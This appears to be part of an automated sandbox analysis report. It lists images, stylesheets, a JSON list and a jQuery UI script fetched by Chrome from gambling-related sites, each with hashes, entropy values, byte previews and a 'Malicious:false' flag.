                                                      SHA1:818ED93066F698F9B0919FC7A2EE84B70E5CEAEA
                                                      SHA-256:DDFF0426C6E649E7EB2FF35AD48AA67994BE7E402DA4BF50EC51FDB759654CAE
                                                      SHA-512:CC11A1B1BE2F5A65594AF160876D8000F68030E879AA85EC97E75AC40656ED3C3F9CA410D879DB03510155F85E019B111507AC4145E894DCBA3D5E9D0ACE8615
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...!.....)'".....................,*'...........q%".&.......x+........1!.. .&...!2$".2-#.......".}Q....tK.."....jD.........g...7'..[............d.(9...@+..!....:4&`>.Y8.O3.......T...-..}.1@.`"..[H,...$....n........[)*.....(....5&......=,.C3.......)..........Q..xT<....G:%`E$}n;D@...K....<J...44.wR(...lM&......................9..............Y)...OL..j*.u5.KR..C.j+..3..+.t4.b...v...C.....,.. .................`Y...E..........o...O.a2...OC-.nE.B:j5..J.Zc.6......A....a..`....n.{=...Z....X.tJ..T..j..9....O..U.......!..]..[R:..T.............to];....N.....rZ.......js..!.h..&..)Y'...].).....<...M...xd.]R..C....2.Dso!.FK.i.......nmws.G..-...@..g.....)....]^n....W]Z....(#..o....}.qhV..v.5.}......jh.AC....(>HD.F..x74.a#.yJ.CE..........Q..... .IDATx...@SW..C..W.X.*.(!l.....LC....H.....X.UD.d...d.PP.AA......V[.....{.......!.......\h=Kj.Ec11zL&3....r.4l.h.v.Z..psQQQs.O....w'..{..z......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                      Category:dropped
                                                      Size (bytes):1150
                                                      Entropy (8bit):4.266277802839599
                                                      Encrypted:false
                                                      SSDEEP:12:FJnhJhJJshO3El90q8SdzX5ggGJkJ5NRLstzpdJVR:Lr1shOg18YX5glJU5NRLs/3VR
                                                      MD5:E13F45BBEB4B9056CFA3D6BD2453F70F
                                                      SHA1:DFC879F8F7279EC929478FEEE93D9B2FDACCE0B1
                                                      SHA-256:331B713DE169D0E56BC71FEE2C7DF0795B24D5B24C045B3AF1A27668783A1D2B
                                                      SHA-512:006F2E5DFEEBAAF68972CA99F01C38FA00BF56CBC043F7983EEAEA4272B04641844086D62D345B29B99E67044BB86292F0EE8EDACD94F90FC270626C990D16C4
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:............ .h.......(....... ..... .........................Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh.."...........2...Lh..2.........../...Ip.........."...8.i.Lh..Lh..Lh..B.9.%.......5.z.....5.z.5.z.....5.z.?.H.<.X.........Lh..Lh..B.:.(.......(...<.\.............(...Ku..5.z.2.......(...Lh..Lh..Lh..>.L.....%...;.`.....2...E.0.Lt..Lh......%...G{$.Lh..Lh..Lh..(...%.......%...Ks..........#...%...Lh..............#...Lh..Lh..>.L.5.z.5.z.Ip..Lh..Lo..5.z.5.z.5.z.Lh..5.z.5.z.5.z.8.i.Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh..Lh...................i.Xr................m.Lh....m.........Lh..Lh...........z...................|.H...i.Lh..........r.9.Lh..Lh.........|.H............................Lh..........Lh..Lh..Lh.....................|.H...............z................Lh..Lh.........|.E.r.9.Lh..Lh..Xr..|.H.`y..Lh..p.7.........k.-.Lh..Lh.........r.9.Lh..Lh..Lh..Lh..Lh..Lh..Lh
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 32076
                                                      Category:downloaded
                                                      Size (bytes):9116
                                                      Entropy (8bit):7.9759062922129775
                                                      Encrypted:false
                                                      SSDEEP:192:FTGaU6c01i8pSTlESk4AmAR1pdHHQY48img32xJMPOp7ox74QBoZ:tGM7pUElmCHHQqimDqaI7bBG
                                                      MD5:AAD113FD284835EC1FBB255356C22CD9
                                                      SHA1:2F1F193ED345C0E42BD022A81F760CF6A24DCE6F
                                                      SHA-256:237392C7D3FAE346242BA9EC97752768659DB0AF525265650A4415A893F1DC7B
                                                      SHA-512:9D10075BFE84A5892781CD3C92120BD40FEA2A0CFAE473A31F0B6B97ED76247D4CDCFCAA977AF72FD160D2D2CFAB9E6440C8BBC3727A94BC4DBE16326CB78804
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/css/jquery-ui.min.css?ver=1606790105
                                                      Preview:...........=is.H...W......'..ac.........\_&..@FHB.....7.JR..]....*......W..ec...{......zZ.oj.TS.u.T..?..0....>...:..+(.:3{...ea....,.~...|.-.....m....p6..t.....uB.......-......).........~...\...........9..S....m...y.i.lKg......,.a..< .k...=\.+L....-l-cW....ru.<....?P.....P$.3\.db....L..Mww.g7...t.........>{.X........k8.c..7..1.....:. f.7..m...P0NR..1..!...P..#..=......=P..#..ox..rR..0..cDG\D)...-.3.&~...."V`......o....Z+mn............jm.V...3.j..I@.......5.(....V.G..e%......R!..f.......yD...aM..4<.wW.w.&..L.<S7...*....q5..*D..#.MT...(....6..C.C..5lo...#o.(...'.1.s*.T.?.Y.2h..J..]....~.P..H.Q...a.K.%. ......].o.4..1.........WLB.tTV..(......(d.J.....D.X....F.y..D...RJb-U.8...d.1...p......B ..2&....dY.C....,..$.)..Bb..2F>..^.z.>t..g...i..{..W...i........u..Fh.4..hN...o.....X2V..p..=.....]8-.B.k...>.f.L!*|s=..8.-9-......0......g\.i..j..9.l.j....)$>...G..vQ....b]7u.|...0S7..$^.^...W..x.V/.>.w.F><U.K.......3.,..,..].O\n.......XJ.b.l. A.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2515
                                                      Entropy (8bit):7.591453391924123
                                                      Encrypted:false
                                                      SSDEEP:48:kzF5BZoSIqsvmrWoui1Wrs7oPUTYMGarNcZfhGobklPBjbO9kNR:qoSIqUWnY650hGIkJj698R
                                                      MD5:72785CB75935F1B64CCD93D6FB515D5E
                                                      SHA1:14DA40A811EE6667A0B8C1BBC92CDCE69EAB62DE
                                                      SHA-256:5CB7A0008F485EA09FD4CA0F82FEB2402C970E43A18D4C2310C51CF666AFF6A7
                                                      SHA-512:B0FDD9930D56AA03E56B9FE14FB7794F0525B01F4E4AD5D24DC234EC071D175095DD41945D379769F145B93F92B920132C6615D41E15FABFED0E27D238498086
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/218_egame_logo.png?ver=1692209012
                                                      Preview:.PNG........IHDR..............P......PLTE...uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW.uW....uW.uW....uW.uW.uW....uW..........uW................................................................uW.........................uW....uW......Le...]tRNS........Z3.G...g.T*...{qN........7...#.la..A'...l< ..c..wM.y>&.........]F5,....T ......8..$....IDATx....R.P...C).m....j+..e.)V.(.&.2...=....\SLH..........|.sB........................5...|>C`7d.....5...s....s..... ....!..KN4.e.....j...!..K.n..KN*,.....%']...VO,5...,..l.$.....P$0+...l...l..J.F..T..qC..b...Jj.T..f..............r..:.G?&.f.].7.8<........+.%o...Z.^R....2...N!.....rQ.{..P.>5x..CW.^..&.r)g....#K..!>.i....Y.&56..)u]i..C`.g.kx...0$.....W.r...K.T`)G...8!..R..w... Iwj\...O...!i.R...}+.!..,...J$.^..YM.P.89.&.Mz6R{.y....@....C...$..S.OY.~j',f..h..1....H.......N.......k.........5.G....5..P[......#.r.6+..6..K1O8M..jl&
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:dropped
                                                      Size (bytes):56687
                                                      Entropy (8bit):7.982486952925965
                                                      Encrypted:false
                                                      SSDEEP:1536:2Ycrbc0W/4o2+9JFGJhapyPTQyIApyNO7:Qva/4o5JF4EwTQvO7
                                                      MD5:15E3740331654B665688615FD33C2D30
                                                      SHA1:D54CC8B341F1C70ECEC2356A6673965D033F5A44
                                                      SHA-256:CFD43CD910F2C49B95ED5F3989221618A113745DC67F34150AA9AE49359B47BB
                                                      SHA-512:3C576E00B0B03785DAE90B1A42ECFB04389A8910899EC7FCE0FB8E4B49B876ED974A60798426F8CFD03E5FD5C5688A6D47A915D9F3CC91F990250C634F027198
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C.............................................................................................................................................................................................RR...............Y*>.O.............................z2..:.rN!`..see.p.........{R...@........................7.l..<....... ..L.i....L......F...........................O#.....#)2O6x.....fk<a%.^F..CS..............................Io.G.....;.$....m...-.................................L.gqg.Vy.n.O...v..=m]0.ig.....;.b.........Vb.............:..Q-?......*)2.P..f...@...A..W...R.........q.~.....".>...y+A.k..f...............KW......C...........|.....nO.m..Vu.i......0...y.,X....x..s.6....n..E..7....$...UU.y0=UmE..Q&.Yn.u...,..eu....H.s..........6..........N4.J.oo`.........o..v..O.=h.p.x...m......*6.j...}....y..x..Z.&..Z..z..H*...X7=..w...]..|..|.|e.. ...}..{..)n.I|/...[.0..c..0.....|.s....;.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):99
                                                      Entropy (8bit):4.1167308164285386
                                                      Encrypted:false
                                                      SSDEEP:3:x1rz9UzWReHv0DSvEJG3w9MQJMJHv1n:jVav0DmYGC4v1
                                                      MD5:66B042ADACAAB1105BFE97C59F5453EF
                                                      SHA1:FE99F09D30B48CC2E4DC95350B4ADA2677B6DCB8
                                                      SHA-256:42DA7EC1A45DC98256C4FE206CE9B134D97AA9764481B18815F96BA2BE987339
                                                      SHA-512:C94532A34A90A261A9D01E60AA630CB9BAC85374C45352B962FFD02F695FB7F8A0A3ACB6FB5C821E9984DF0965A4E86F18CB61E4A53E203F7D73E553CB5221C4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/getcatlist/224
                                                      Preview:[{"cat_id":802,"cat_name":"Newest","icon":"new"},{"cat_id":"all","cat_name":"all games","icon":""}]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):4561
                                                      Entropy (8bit):7.866680088746412
                                                      Encrypted:false
                                                      SSDEEP:96:L7ZdoDdUB/49yQRkqlCr581SIK3gC4yw/44Ie2QaSiT/O:LtCDdUBg9yQRknA4gfysphIq
                                                      MD5:D45F6CB47366C48F4404F841AAF1F736
                                                      SHA1:D718B098AA528C6B22E325D8DB1BF5A211FF189D
                                                      SHA-256:CCED9EA4418D6A8354D10FE74BD7C9A8DCBE26835BA68927A71FCDBC5D01D616
                                                      SHA-512:C43C663CA437E69725CCC982300DFB71F4AB327A5BA9FB6A47C1B68F0057BD45D06D9F022F62EBED41EFC09999D966E455B59EF60F844D165EB42427AC1DA9FF
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...I.d4..:..B.xI.b;..H.eA.{H.fP.OC.uE.n3..8..?..B.z9..J.aB.vD.rG.i9..<..:..=..L.X5..:..5..I.eL.Z?..R.H+..T.A6..U.>N.VS.DJ.a9..H.gI.dT.C8..I.c:..?..M.WV.=*..6..<..N.T9..M.X+..6..S.D)..3..+..@.|*..A.}-..,..=..C.uH.g?..J.`*..2..H.g3..+..U.@0..D.rT.D2..C.uN.S...+..7..2..)..-..,..7..*..U.@1..P.OU.?G.j@..U.?2..:..N.TL.YJ.`O.O7..<..0..>..?..@..C.wC.sE.p1..F.mQ.K=..B.z-..6..T.B...9..G.jR.H+..I.d/..4..A.|5..6..H.f4..,..U.>H.h*..K.\0..S.E9......cJ[...etRNS... . @@@0p.....P0....`......@..p@ ....`..pP..........PP...p`@0.......p`P......k.............02).....eIDATx.....@.@.#.....h.....%8..M.B..Ap.D......>?...............%E.wm;M.=.ei...$.T.......b.h...>.".....n=...e..Z].).}=......i.w....}.5..4.0...1.X..5.M8p.@$.c4@kkb .B.W......6..r......}.k.avf(..<..<y..Z..Ok...QF..S,M....Faj...).N.z\..^.)......b....A4..h83..4-.V.p....1.A.i.(k....x.f....b.........{D..2...fF.8!.O.e..#...).bt...G..af.F..Gt.2'...&..D.WWW.%.h."....z..y.9..L.+D...i.D4..Ec..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 22957
                                                      Category:downloaded
                                                      Size (bytes):4634
                                                      Entropy (8bit):7.957146250617521
                                                      Encrypted:false
                                                      SSDEEP:96:rLd6xfgylXy5e5CGI6OygLkvrItclTf/X+iASlCbYR3d/z2P487i1Ii:rLISGy5eoGItyXrIsr/X+GmYb/zi1WN
                                                      MD5:9D0917A1633E0F734519A536A3CEBDEF
                                                      SHA1:6BD35D49349C0FA32932630E671EE840BB67A186
                                                      SHA-256:8C53987019F5819B0049B854AEC6098FA4F2983A6B131360A253418BC6141C9C
                                                      SHA-512:43D0D68739B630730348AD6DFBFE800F52BE761DF9FEFA51CEA9F994155F84B292B5D5304889295BB0882CDF2D7C1FB7FEFAE1000774ECB70A3BFFD780052C5D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/css/sweetalert.css?ver=1606790105
                                                      Preview:............k......O...Q...j..c.g..3.L.I.....k.TI.......v. ..:;.+.&....w.\pUg.FmW.v..eYT7...!.yq..b2...k..~.7...[.m.ey.k...F.].w.>+.wr.*]..i..*K.uY7K.*a.A<.L...J|..~Ovm.)............Ko.WMZ.....)....t...~..}.O.E......'}.....*=.....h......Z.M.6.p..7@...m...w.....w.GV.{ v)...q.IQe.[....KZ.M.......M]u.&..%.|..>..w..G......M...T.!..aD....M....I.7..Q.+.n.....[.{.f...P.T.....&i..m.b.F..m..eq.\Y...E..qj.4B.~..MQ%...tq.....L.c5..`...5..\...]...H.R.U&.v..H^...c.k!H-....C...F....k)sk.V..V.M.e8B3......y;%|......G.....?.K1#......r..Y..(.$@...Z.B.J..e..o..1.K1.*..[:BP....[?rUm...*k0g..}...k...j.$v....uI.YVT[....,......Otj...]..I...."/.6WV-..'{...>.Fm..MS7.#....7.=.=.L.G..hl.V.%......2....Fkb..O....K....$...h.h...x..Qh..@r.g.....m}GL..@.Y.......L...!B.}:..".t...|.Q.#JY.."F..]S....).".E>k:7....WW..]T@...2..q.'.k......`.c........o.....`.a....a.)..m.L.8i..].uy..+H......H.N..b.k3...#.J;(.C.bk.&*K.!..G..c...y....* .B,..-.B.....RP..`......'1.X.\.W9..a.M..n
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2587
                                                      Entropy (8bit):7.861689203566001
                                                      Encrypted:false
                                                      SSDEEP:48:2XCNILaPjbJriBND5E3iM9M+sQ9Sif0BlrmqFdRsN9pWOyGoR0h/E+smUWlIjUud:NGGrbW5lMtEhfFYM31Kh/EHWlMKOY3pk
                                                      MD5:57091F1AD57C56BBB3CB3F94A0F32282
                                                      SHA1:518CE2AED7DEA9F4F1DE1370D89D90E59CEF4787
                                                      SHA-256:0CB41F67295BB5466DC69AC14E729D181CA6D1706CBD1637AA8C3E6ACE4801E5
                                                      SHA-512:262EA83ED924FBBCFC124A205DF80EE04D4705F11C86AA1F11AC0EFECC40DC47D1774764EC1F79E2159E226F1BA68F91E05D5E355FF2826C7781B947DFC11499
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....3PLTE....................................................|y.....tRNS.....@..0` .P..p..s.....IDATx...!..... ....F .................g.I..0.E.6.....I%..v2q.E..n>U..i.....yv.r.nZ..].].i..7]...e.].\.....:......Q......M].+...NO>Wk...b...X.5(;F..].Z......[]["3F.....qj*h:...9%..m....M...\.=.........6.:<?.&.i.tC.3Y..`e.#..<..W.h.$0s..3..\.Z...1....hh...h.&..L...B..E......6Yf..EK..l...B.G.F.....P9..q.z./3..zh/.C.<..N.^.....;.&.S.R;... 9.......*....`.._.P..W.....BC.T .....In....BQ.....2...92>....UE......#.P.z.....~o...Ij!.OB...\....&8...!C..p..K:.O..(C..:...A..|r../.....g.CF.2E....#@U.........L..o7....wX@..z... .\.'CR..9....&..d.Y..=.......L..`....DF...YH....8.;...&5...Yd....0M..{....Y.....1......IdB..~\.....D.$........d....a.........l....@.....M...+.#.I...d....5\...B..H..e...._.f.LJ.+.N.M....B.@..tR..5..(.|1.H1kP...G....Y..5.9...I...DB..!^..D..Y.W..xfR..pF.."..X.{n.-j.>JK6...;...X.e.E&.)}.>.D@.\.1d..`.&.*.l..d= ....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 204x263, components 3
                                                      Category:downloaded
                                                      Size (bytes):22853
                                                      Entropy (8bit):7.973884115074719
                                                      Encrypted:false
                                                      SSDEEP:384:RRO4bWtbaUFMcT9AC/vUTK3rQQif5njkhzFWWfDNh5OKdX16drDfEWsa51QM0l+K:Xat+/89AMUTKdg5njk9Lh5OKB1ADfEWs
                                                      MD5:7AF1A6E2465455A6E6BCC6780D03E11B
                                                      SHA1:5FB613E10BC2EDC8F8F2B79142C2C48B98D47D86
                                                      SHA-256:BF5564DC4EC2BAE6F108CDDF5EBE03ED8554098BD0F47640CA572393F9025913
                                                      SHA-512:1010521B100DF979350181C366BF1579D5264B9A2EFB926C3BBE2C24B4DFBBB3D07066C4B6F13E14CEA25105427B74D07EB77F3B862CC2F2021F5A456E1564B6
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/en/p-img2.jpg
                                                      Preview:......JFIF.............C....................................................................C..................................................................................................................................................................p.......L...........|....M&....2fr.2m..~'DP......~.....G..&."%.?..xX:#...`....~.....2.5.,&qj.Nm.lM1[......4......../Jw.....;.et.o...~5.oi......x.. ...F..>....%x..u..Q.x.......Vsh.}A.C.8.....{~\.....~.........#../.#+..$..A....>o.g.*}...............4.......o.l... .}K.y....c%..hu6.}b...:.oj.q.k.......|......W....'/.....L.8M..5(q.? 8..;........../N.Hx..!.......|...........9..t.....Q..O...O.._.}.....ang...I...#..8]..5...l.l..4........!..!..y{/.jv.K..G..=o.c.........>..:.s......E.......F..>..s.x....&.w?....]........_t...<.I..?...T..^...<r...G.............7Z.m|Tl.2U......jS..K)..f.>..o/.Sj....s.$..h?..!.(`.H..'&Q..B . ...F..tL.E..0.U.1pd...I...6g8iZ"..&2d.3`0....K.....N.....W....W9..82.z..K.T.J..g..x.Z
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):20678
                                                      Entropy (8bit):7.976680745513207
                                                      Encrypted:false
                                                      SSDEEP:384:ngdK084X0btzWvbYcVZidreRLJ74dnfp0c3acEQEtFtKYQgYLTPdXtrv:ngdKx4kbMTlVZMyRBynfpzKcErtKYNY3
                                                      MD5:8B870FCF3B971673029D5B90559D47CF
                                                      SHA1:1697425C64FA897666DF7822A2091E9559E481D6
                                                      SHA-256:3167AFC8EC470A3510BE1BCE1426DB8306F47216BA3D2DCD1D0AC7247443E1E4
                                                      SHA-512:A4745FC13DC7FA680D86180B98442654F0D49001FDE8C75C68A08365F0D24EBCD890B9B874B34C3757C1486B55A5410E0DC1286F0F6651C4EE35F3D3E211CE45
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/jdb/9020.png?ver=1715740152
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE.&..=..i.Ke..K.../.+.6Y..P..F..^..w..p.&P..A..d.?\.:]....Sj.E`.?d..W.....8....,X....7j........6.7.3a...K..%[r..3.{..es..0..W.&..)y..f%.?.......(o..f60S....)f...A..V.Z2.H...>q.$].2...B..w..Z.l..q: ..b.M..P..w,8.......N..q6w.......s,.r<.G(..K\k..H..<..qy.H.........$.C..,.A..l...g~...6Hn...........^......\..r...\.Oj3.......8...^. .g...-..yP$.........G.}.Nw....h...c}@ ...,..../.N....]g...T.2.h..Q.B....!..H..R........-..J.........w;X..."...*..RG.o...U2...j....8.H......../.^(..>.R.."@....bm."Z...`O.T.$.u.iZ.......K|...>...-P.H.....ux!U...k~.)m..2.$..t|..M..c...JW...e.@/...5j.....g.l..a..y.....?{.>.B.eF_........zP........4.B.P0....kC.[.<.........iX.F......2%...Y|.oL..P..T.W.._l}..?....Ss.x..){'...c %.......T;8.z.{.Ww*......J.caFVg{.. .IDATx..{\Mi....q.8M(.O....CBQ6..#5h4C..v1.B.S*wG....'SD.$.0rf.L....0.4.=....~_........{.....k]..z...Zk..........{=....}...&t...l...!.......=Z...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3395
                                                      Entropy (8bit):7.881110825148547
                                                      Encrypted:false
                                                      SSDEEP:96:DkS/NQONylGvobHEZF+iJ/vU0zsQu8l6j0drtb:4ZgorEZFdjfFl6j05tb
                                                      MD5:B1512E75EB5AE38A96D889A1EE233AB0
                                                      SHA1:89898F381391D68504062B662B387A1C4E3E34D5
                                                      SHA-256:9652C86737768F22614F765F2B1AF2287274FB9007E098B91DD66EFFCD144AB5
                                                      SHA-512:828E55F619BAFE8C029C496D5AA7FAEB0F9FFB334DF1CDBC60F19528C0F97F84922E276A767B58EED27008DA55F0F444904C016FB20296D200AAAC2B0D2A9810
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE....4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.4Z.>6:.../tRNS.... .......'....2.>......iIxq8]..W.-R.Dc~N.^....3IDATx.....@...jP..D..7.w...%9.4'...e.3|.s1...WU.R.R.T*.J.R.T*.k...Lj...lY.f....*.w..a...hB....F.i.vq.q..8.x.o........`. iv.....@A/.$..[8..Z.../._.rZ...n..5... ..._.V...A..j..Q.,ADe.......]...xG..8..h;.....x.7!i..R6T...3W$i# .P....M2..O..+..a.S........G..7.....:%...bm*..Y.Y.tEb..x..P!2.\..$..qf..{&*....7b....qx..P..d......u.g.....F..#..f...h......'JS.#6....w......X}v`.W.wGJ.Aa._~* ..U.I).(.Zgz.o"v%6.w=J.Ea....+H.I.5.S.\....;..M.j.3...S)&6)............p.*<x...'..v.......w.X...........I..bDE.^..b@lkQ.b........1.A\.N...+.z.b.6q5[.n5..Ma.......L@..'.z.....0.n.J....s..z{..HtO...X(.\.3..._D.j...f(.Kp...f..1..g.H.B.-..G....D%Y#1...FC.s\.y.z.T.dA&.>1..K.)LH!......LL.9T.kb. ...&..y{..).Ez....T.9.#i..9!......i(
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):28798
                                                      Entropy (8bit):7.986337296568113
                                                      Encrypted:false
                                                      SSDEEP:768:z4AvzLY3b0xh8bNKYXDlF3/N45Yu1oPWM8P:zRYL0owADltSoPC
                                                      MD5:04AAAD6EE31D0BDB668C2210AFF038A1
                                                      SHA1:FD111FBB1F7DE4F726CD2EDB40D24B42F3CF91BF
                                                      SHA-256:70D811FE3C4FD1B7D7429B4290E5FA26509DCB35A54F0C84AD20135273523EFC
                                                      SHA-512:4EAB155DC078519778C79F97222C9223A9CAD58CE29C2B6F03B5316FE01696B889240B58123F3244B10AFC9E600823A8BCA73A6FB52D6DDE716F7138F72BEE45
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/cz3wgrounyetc.png?ver=1673334590
                                                      Preview:.PNG........IHDR...............^.....PLTE....">.3_.;i.#7.,Y.Br.M{.1h.U..&N.G.. ..&...3...*A.]..S..c..g.L...5t....N.Y-......3!h.nK..]4.?..4.......]..........w..O)..$..,.x.5|.7..'.1.......k.....~.k>,l...8h6..U..)...........(.9......*2..c.....q$t.<.3..r..]...J..Mh..H).....va.......?.'...9...wIc.......2..1=.E[m......E..-b..o.9.... .........G..{..r.Z..V.\.XF.......yb....9....%*tJ...J.L...Y...2..[.."Jo.w+...P.D0......B.D22:..1y`.v..\......./..o...x.OU..c...._?....b.@. @c.#]..E.='.p..P.[5L;5.h..gV!5QI|.0RxuyD.........Wk.iJ-.......Z1..:t..F..D.y....k..g|.1q.z...t?.{o.}a.....9K\....8.h..oO.........?..a]U&]..s...jQ.u..@...o.c....n...g...n......,L........f......3.......Q.P#.o...K......6....+.k.=U........^..2pEE....g.:.x.f..8...F.k..StjN...........-...h..9...p...Q.....m9IDATx.|.oh.e..{w.?...g.y..g65.D=..f.."d/...V...T...a.......X.{qt..eV..lc..-..&. .....EeXf..@_....%i..=w...=.....<....|>?...+.t>.9I...$.U<.;.o"..h....y...T.I."g..q..?.i....2<.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32074)
                                                      Category:dropped
                                                      Size (bytes):253669
                                                      Entropy (8bit):5.142891188767758
                                                      Encrypted:false
                                                      SSDEEP:3072:FkHOJD1g7SV7opRBbDrtnAcKYvFJi/5PLO1aG0qF2/nwOW16j:q9/KvjOVlFYQ16j
                                                      MD5:C15B1008DEC3C8967EA657A7BB4BAAEC
                                                      SHA1:78489E580ADAEF931E6E5B131DAB556C397E4A1A
                                                      SHA-256:28CE75D953678C4942DF47A11707A15E3C756021CF89090E3E6AA7AD6B6971C3
                                                      SHA-512:BADA3D9A5433AECE7D57020B70B89161E2CA3CF6D2FDB4FBD5D6BF38405813071D35493C8D8232F83D7BE91628A29D436BE7FD9AF918AE68F93022D9584B50B8
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*! jQuery UI - v1.12.1 - 2016-09-14.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortabl
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):25135
                                                      Entropy (8bit):7.988312083796085
                                                      Encrypted:false
                                                      SSDEEP:768:lDIOEhemutCZwao5LalLoXgMjtSbCI16GO1B8g:l0JitCW/p7gMRS2I16lB8g
                                                      MD5:55F8778346A30651B7027BBA5532C5F2
                                                      SHA1:8C9D470A4A4DF4D92781ACA083CC15C0BA46BCB4
                                                      SHA-256:903FCABEC6D3DA2728B5C6FCB183A9C79FE17A829D50A3AD51557905FB7CE6A8
                                                      SHA-512:FB634D19C61ECF7A442D5EB6D538F0679B270478F61FC74C2EF5D84F7FF376E946E6D51A6CBACC2D8744E3BF803AD389764A26DF1E418C68CA9B00503B2FE8DC
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE................................. ........"..#..#........%..$.. ........l5.i4.8.....d2.b).2-):...w..h.? ..."%..I$.Q&..?/.O.W+....M".;58..*N....|7..d2.P".....#Z-.._..B.......B..................`..W3|iC."... @"...L....*]5...Y'..>C.d.....l).sI.eL..Y|I..f.b$.@z`?....!....?U.6.n .......(!x.!.....W..;...T..?..|.............>.z.....vR.......K........^qFC........n..o...V...\D....6&.n`...8'..............................#..o6....,....j................4$.....X.....I....@........O5.@+ C1*...N:2.........+..S..TDAZD0...'$&H$..........d'|iTbRLmI#_?....9...s`...eN:.....u@AAFqZB.$...|.p]TzS'.........Tz@.....{OOV.M?....y.5&....]Q....b.W..s"+@...}xrnkn_]^\,.....\............i.zo.tmd......G....ka...._>.....3'..n'=.I....:-.2#.[..9/5!a.........tRNS.....*1#:EOCY.nxd.cPZ.....:o.............v..c...R...............(d..............B.......P..s}..'.....^V................X.......p....^YIDATx.....0.CQ..i..Pd.l...6..A.....
